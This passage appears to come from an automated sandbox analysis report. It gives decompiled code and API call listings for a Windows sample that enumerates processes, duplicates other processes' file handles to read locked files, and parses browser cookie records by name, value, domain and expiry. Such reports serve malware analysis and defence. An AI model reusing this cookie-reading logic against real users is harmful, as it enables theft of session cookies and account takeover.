	_t99 = E0040C572(_t155, _t165); // executed
	_v16 = _t99;
	FindCloseChangeNotification(_v12); // executed
	_t154 =  *_t155;
	_t101 = GetCurrentProcessId();
	if(_v16 == 0) {
		_t153 =  *_t154;
		if(_t153 > 0) {
			_t152 =  &(_t154[2]);
			do {
				if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
					_v32 =  *_t152 & 0x000000ff;
				}
				_t152 =  &(_t152[0x10]);
				_t153 = _t153 - 1;
				_t170 = _t153;
			} while (_t153 != 0);
		}
	}
	_t102 = 0x20;
	_v64 = _t102;
	_v48 = _t102;
	_v72 = 0;
	_v60 = 0;
	_v68 = 0;
	_v56 = 0;
	_v44 = 0;
	_v52 = 0;
	_v100 = 0;
	_v96 = 0;
	_v92 = 0;
	_v88 = 0;
	_v84 = 0;
	_v80 = 0;
	_v76 = 0;
	E0040CE93(_t153, _t170,  &_v100); // executed
	_v20 = 0;
	if(_v44 > 0) {
		do {
			_t110 = E0040C982(_v20,  &_v56);
			_t36 = _t110 + 4; // 0x4
			_v12 = _t110;
			_t111 = E00405888(_t36);
			_t158 = _a4;
			_v16 = _t111;
			_v8 = 0;
			if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
				goto L26;
			} else {
				while(1) {
					_t114 = E00406306(_t158, _v8);
					_push(_v16);
					_push(_t114);
					L0040E03E();
					if(_t114 == 0) {
						break;
					}
					_v8 = _v8 + 1;
					if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
						continue;
					} else {
						goto L26;
					}
					goto L27;
				}
				_t116 = OpenProcess(0x40, 0,  *_v12); // 0x40 = PROCESS_DUP_HANDLE
				__eflags = _t116;
				_v16 = _t116;
				if(_t116 != 0) {
					__eflags =  *_t154;
					_v24 = 0;
					if( *_t154 > 0) {
						_t159 =  &(_t154[1]);
						do {
							__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
							if(( *_t159 & 0x0000ffff) !=  *_v12) {
								goto L21;
							} else {
								__eflags = (_t159[2] & 0x000000ff) - _v32;
								if((_t159[2] & 0x000000ff) != _v32) {
									goto L21;
								} else {
									_v8 = 0;
									DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed; copies the remote handle into the current process: access 0x80000000 = GENERIC_READ, options 2 = DUPLICATE_SAME_ACCESS
									__eflags = _v8;
									if(_v8 == 0) {
										goto L21;
									} else {
										_v1624 = 0;
										memset( &_v1623, 0, 0x3e7);
										_t164 = _t164 + 0xc;
										_v36 = 0;
										E0040C41D();
										_t128 =  *0x4132a8;
										__eflags = _t128;
										if(_t128 != 0) {
											 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36); // indirect call through the function pointer stored at 0x4132a8
										}
										CloseHandle(_v8);
										_v40 = E00405888( &_v1616);
										_t131 = E00405888(_a8);
										_push(_t131);
										_push(_v40);
										L0040E03E();
										__eflags = _t131;
										if(_t131 == 0) {
											 *_a12 =  *_v12;
											_v28 = 1;
											 *_a16 = _t159[3] & 0x0000ffff;
										} else {
											goto L21;
										}
									}
								}
							}
							goto L24;
							L21:
							_v24 = _v24 + 1;
							_t159 =  &(_t159[8]);
							__eflags = _v24 -  *_t154;
						} while (_v24 <  *_t154);
					}
					L24:
					CloseHandle(_v16);
				}
				__eflags = _v28;
				if(_v28 == 0) {
					goto L26;
				}
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L27;
                                                                                                                                                                    						L26:
                                                                                                                                                                    						_v20 = _v20 + 1;
                                                                                                                                                                    					} while (_v20 < _v44);
                                                                                                                                                                    				}
                                                                                                                                                                    				L27:
                                                                                                                                                                    				if(_v100 != 0) {
                                                                                                                                                                    					FreeLibrary(_v100); // executed
                                                                                                                                                                    					_v100 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				E00403F55( &_v56);
                                                                                                                                                                    				E00403F55( &_v72);
                                                                                                                                                                    				return _v28;
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040C725
                                                                                                                                                                      • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
                                                                                                                                                                    • memset.MSVCRT ref: 0040C8AF
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040C902
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 832456665-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                    				long _t7;
                                                                                                                                                                    
                                                                                                                                                                    				_t5 =  *__eax;
                                                                                                                                                                    				if(_t5 == 0) {
                                                                                                                                                                    					return _t5 | 0xffffffff;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
                                                                                                                                                                    				return _t7;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3562636166-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                    			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
                                                                                                                                                                    				char _v4;
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				struct HWND__* _v12;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				struct HWND__* _t53;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				struct HWND__* _t69;
                                                                                                                                                                    				struct HWND__* _t71;
                                                                                                                                                                    				struct HWND__* _t76;
                                                                                                                                                                    				int _t82;
                                                                                                                                                                    				int _t84;
                                                                                                                                                                    				struct HWND__* _t85;
                                                                                                                                                                    				void* _t93;
                                                                                                                                                                    				struct HWND__* _t107;
                                                                                                                                                                    				struct HWND__* _t108;
                                                                                                                                                                    
                                                                                                                                                                    				_t93 = __edx;
                                                                                                                                                                    				_t92 = __ecx;
                                                                                                                                                                    				E0040E340(0x27a4, __ecx);
                                                                                                                                                                    				_t42 = E00402754(_t92);
                                                                                                                                                                    				if(_t42 != 0) {
                                                                                                                                                                    					E0040DA9D();
                                                                                                                                                                    					SetErrorMode(0x8001); // executed
                                                                                                                                                                    					 *0x412b10 = 0x11223344;
                                                                                                                                                                    					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
                                                                                                                                                                    					E0040621C( &_v4);
                                                                                                                                                                    					_push( &_a76);
                                                                                                                                                                    					_a36 = 0x20;
                                                                                                                                                                    					_a28 = 0;
                                                                                                                                                                    					_a40 = 0;
                                                                                                                                                                    					_a32 = 0;
                                                                                                                                                                    					_a44.hwnd = 0;
                                                                                                                                                                    					E0040BB15(__eflags);
                                                                                                                                                                    					_a1800 =  &_v8;
                                                                                                                                                                    					E004064A1(_t92, __eflags,  &_v8, _a12); // executed
                                                                                                                                                                    					_t53 = E004065C4(_a1792, L"/savelangfile");
                                                                                                                                                                    					__eflags = _t53;
                                                                                                                                                                    					if(_t53 < 0) {
                                                                                                                                                                    						E00407259(); // executed
                                                                                                                                                                    						__eflags = E004065C4(_a1800, L"/deleteregkey");
                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                    							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
                                                                                                                                                                    							if(__eflags <= 0) {
                                                                                                                                                                    								L7:
                                                                                                                                                                    								E0040BA94( &_a72);
                                                                                                                                                                    								__eflags = _a664 - 3;
                                                                                                                                                                    								if(_a664 != 3) {
                                                                                                                                                                    									_push(5);
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_push(3);
                                                                                                                                                                    								}
                                                                                                                                                                    								ShowWindow(_a592, ??);
                                                                                                                                                                    								UpdateWindow(_a592);
                                                                                                                                                                    								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
                                                                                                                                                                    								__eflags = GetMessageW( &_a44, 0, 0, 0);
                                                                                                                                                                    								while(__eflags != 0) {
                                                                                                                                                                    									_t69 =  *0x412c2c; // 0x0
                                                                                                                                                                    									__eflags = _t69;
                                                                                                                                                                    									_t107 = _t69;
                                                                                                                                                                    									if(_t69 == 0) {
                                                                                                                                                                    										L14:
                                                                                                                                                                    										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
                                                                                                                                                                    										__eflags = _t71;
                                                                                                                                                                    										if(_t71 == 0) {
                                                                                                                                                                    											goto L15;
                                                                                                                                                                    										}
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t85 = GetForegroundWindow();
                                                                                                                                                                    										__eflags = _t107 - _t85;
                                                                                                                                                                    										if(_t107 == _t85) {
                                                                                                                                                                    											L15:
                                                                                                                                                                    											_t108 =  *0x412c2c; // 0x0
                                                                                                                                                                    											_v12 = _a1820;
                                                                                                                                                                    											_t76 = IsDialogMessageW(_a592,  &_a44);
                                                                                                                                                                    											__eflags = _t76;
                                                                                                                                                                    											if(_t76 == 0) {
                                                                                                                                                                    												__eflags = _t108;
                                                                                                                                                                    												if(_t108 == 0) {
                                                                                                                                                                    													L18:
                                                                                                                                                                    													__eflags = _v12;
                                                                                                                                                                    													if(_v12 == 0) {
                                                                                                                                                                    														L20:
                                                                                                                                                                    														TranslateMessage( &_a44);
                                                                                                                                                                    														DispatchMessageW( &_a44);
                                                                                                                                                                    													} else {
                                                                                                                                                                    														_t82 = IsDialogMessageW(_v12,  &_a44);
                                                                                                                                                                    														__eflags = _t82;
                                                                                                                                                                    														if(_t82 == 0) {
                                                                                                                                                                    															goto L20;
                                                                                                                                                                    														}
                                                                                                                                                                    													}
                                                                                                                                                                    												} else {
                                                                                                                                                                    													_t84 = IsDialogMessageW(_t108,  &_a44);
                                                                                                                                                                    													__eflags = _t84;
                                                                                                                                                                    													if(_t84 == 0) {
                                                                                                                                                                    														goto L18;
                                                                                                                                                                    													}
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    										} else {
                                                                                                                                                                    											goto L14;
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    									__eflags = GetMessageW( &_a44, 0, 0, 0);
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								__eflags = E0040BD40( &_a72, _t93, __eflags);
                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                    									goto L7;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						 *0x4131d0 = 0x412374;
                                                                                                                                                                    						E004073F7(_t92);
                                                                                                                                                                    					}
                                                                                                                                                                    					E0040BC51( &_a72, __eflags);
                                                                                                                                                                    					E0040623E( &_v8);
                                                                                                                                                                    					E00403F55( &_a24);
                                                                                                                                                                    					E0040623E( &_v8);
                                                                                                                                                                    					_t60 = 0;
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t60 = _t42 + 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t60;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                                      • Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                                      • Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                                      • Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
                                                                                                                                                                    • EnumResourceTypesW.KERNEL32 ref: 0040BEE6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                    • Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                                    • Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                                    • Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040D071(struct HINSTANCE__** __esi) {
                                                                                                                                                                    				void* _t7;
                                                                                                                                                                    				struct HINSTANCE__* _t8;
                                                                                                                                                                    				_Unknown_base(*)()* _t14;
                                                                                                                                                                    
                                                                                                                                                                    				if( *__esi == 0) {
                                                                                                                                                                    					_t8 = LoadLibraryW(L"psapi.dll"); // executed
                                                                                                                                                                    					 *__esi = _t8;
                                                                                                                                                                    					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
                                                                                                                                                                    					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                                                                    					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
                                                                                                                                                                    					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                                                                    					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                                                                    					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                                                                    					__esi[4] = _t14;
                                                                                                                                                                    					return _t14;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t7;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,751459F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                                    • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                                    • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                                    • GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                                    • GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                                    • GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                    • API String ID: 2238633743-4233621989
                                                                                                                                                                    • Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                                    • Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
                                                                                                                                                                    • Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                                    • Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                    			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				int _v16;
                                                                                                                                                                    				int _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                    				int _v60;
                                                                                                                                                                    				int _v64;
                                                                                                                                                                    				int _v68;
                                                                                                                                                                    				char _v72;
                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                    				int _v80;
                                                                                                                                                                    				int _v84;
                                                                                                                                                                    				int _v88;
                                                                                                                                                                    				int _v92;
                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                    				intOrPtr _v100;
                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                    				void _v124;
                                                                                                                                                                    				void _v132;
                                                                                                                                                                    				void _v136;
                                                                                                                                                                    				char _v140;
                                                                                                                                                                    				char _v912;
                                                                                                                                                                    				char _v936;
                                                                                                                                                                    				char _v1496;
                                                                                                                                                                    				char _v1500;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t89;
                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                    				intOrPtr _t119;
                                                                                                                                                                    				intOrPtr _t120;
                                                                                                                                                                    				intOrPtr _t121;
                                                                                                                                                                    				intOrPtr _t122;
                                                                                                                                                                    				intOrPtr _t123;
                                                                                                                                                                    				intOrPtr _t124;
                                                                                                                                                                    				intOrPtr _t125;
                                                                                                                                                                    				intOrPtr* _t137;
                                                                                                                                                                    				intOrPtr* _t139;
                                                                                                                                                                    				void* _t142;
                                                                                                                                                                    				intOrPtr _t147;
                                                                                                                                                                    				intOrPtr _t148;
                                                                                                                                                                    				void* _t151;
                                                                                                                                                                    				void* _t163;
                                                                                                                                                                    
                                                                                                                                                                    				_t151 = __edx;
                                                                                                                                                                    				_v76 = 0x100;
                                                                                                                                                                    				_v56 = 0x100;
                                                                                                                                                                    				_v80 = 0;
                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                    				_v84 = 0;
                                                                                                                                                                    				_v60 = 0;
                                                                                                                                                                    				_v72 = 0;
                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                    				_v64 = 0;
                                                                                                                                                                    				E00403E49( &_v1500);
                                                                                                                                                                    				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
                                                                                                                                                                    				_t164 = _t89;
                                                                                                                                                                    				if(_t89 == 0) {
                                                                                                                                                                    					L30:
                                                                                                                                                                    					E00403E8F( &_v912);
                                                                                                                                                                    					E00403F55( &_v936);
                                                                                                                                                                    					E00406710( &_v1496);
                                                                                                                                                                    					E00406355( &_v72);
                                                                                                                                                                    					return E00406355( &_v92);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_v12 = 0x20;
                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                    					do {
                                                                                                                                                                    						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
                                                                                                                                                                    							_t161 =  &_v20;
                                                                                                                                                                    							_v24 = E004039C1( &_v20, L"Name");
                                                                                                                                                                    							_v28 = E004039C1( &_v20, L"Value");
                                                                                                                                                                    							_v32 = E004039C1( &_v20, L"Path");
                                                                                                                                                                    							_v36 = E004039C1( &_v20, L"RDomain");
                                                                                                                                                                    							_v48 = E004039C1(_t161, L"Expires");
                                                                                                                                                                    							_v52 = E004039C1(_t161, L"LastModified");
                                                                                                                                                                    							_v44 = E004039C1(_t161, L"EntryId");
                                                                                                                                                                    							_v40 = E004039C1(_t161, L"Flags");
                                                                                                                                                                    							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
                                                                                                                                                                    								_t109 = memset( &_v136, 0, 0x2c);
					_t163 = _t163 + 0xc;
					E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
					E0040518A( &_v92, _v36);
					_t114 = _v92;
					_v112 = 0x40f454;
					if(_t114 != 0) {
						_v112 = _t114;
					}
					E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
					E0040518A( &_v72, _v32);
					_t119 = _v72;
					_v116 = 0x40f454;
					if(_t119 != 0) {
						_v116 = _t119;
					}
					_t120 = _v24;
					_t147 =  *((intOrPtr*)(_t120 + 0x328));
					if(_t147 <= 0) {
						_v108 = 0x40f924;
					} else {
						_t139 = _t120 + 0x220;
						 *((char*)(_t147 +  *_t139 - 1)) = 0;
						_v108 =  *_t139;
					}
					_t121 = _v28;
					_t148 =  *((intOrPtr*)(_t121 + 0x328));
					if(_t148 <= 0) {
						_v104 = 0x40f924;
					} else {
						_t137 = _t121 + 0x220;
						 *((char*)( *_t137 + _t148 - 1)) = 0;
						_v104 =  *_t137;
					}
					_t122 = _v48;
					if(_t122 != 0) {
						memcpy( &_v132, _t122 + 0x220, 8);
						_t163 = _t163 + 0xc;
					}
					_t123 = _v52;
					if(_t123 != 0) {
						memcpy( &_v124, _t123 + 0x220, 8);
						_t163 = _t163 + 0xc;
					}
					_t124 = _v40;
					if(_t124 != 0) {
						_v96 =  *((intOrPtr*)(_t124 + 0x220));
					}
					_t125 = _v44;
					if(_t125 == 0) {
						_v140 = 0;
						_v136 = 0;
					} else {
						_v140 =  *((intOrPtr*)(_t125 + 0x220));
						_v136 =  *((intOrPtr*)(_t125 + 0x224));
					}
					_v100 = _a8;
					 *((intOrPtr*)( *_a4))( &_v140); // executed
				}
			}
		} while (E0040489D( &_v1500) != 0);
		if(_v20 != 0) {
			free(_v20);
		}
		goto L30;
	}
}



























































                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F
                                                                                                                                                                      • Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0
                                                                                                                                                                    • free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B
                                                                                                                                                                      • Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA
                                                                                                                                                                    • memset.MSVCRT ref: 00403CCA
                                                                                                                                                                      • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                                      • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                                    • memcpy.MSVCRT ref: 00403D7C
                                                                                                                                                                    • memcpy.MSVCRT ref: 00403D97
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcslen
                                                                                                                                                                    • String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
                                                                                                                                                                    • API String ID: 4182952938-1692241855
                                                                                                                                                                    • Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                                    • Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
                                                                                                                                                                    • Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                                    • Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                    			E004039F6(void* __eax) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                    				char _v52;
                                                                                                                                                                    				void _v578;
                                                                                                                                                                    				int _v580;
                                                                                                                                                                    				void _v1106;
                                                                                                                                                                    				long _v1108;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                    				signed short _t48;
                                                                                                                                                                    				int _t55;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                    				void* _t77;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				signed short* _t100;
                                                                                                                                                                    				void* _t102;
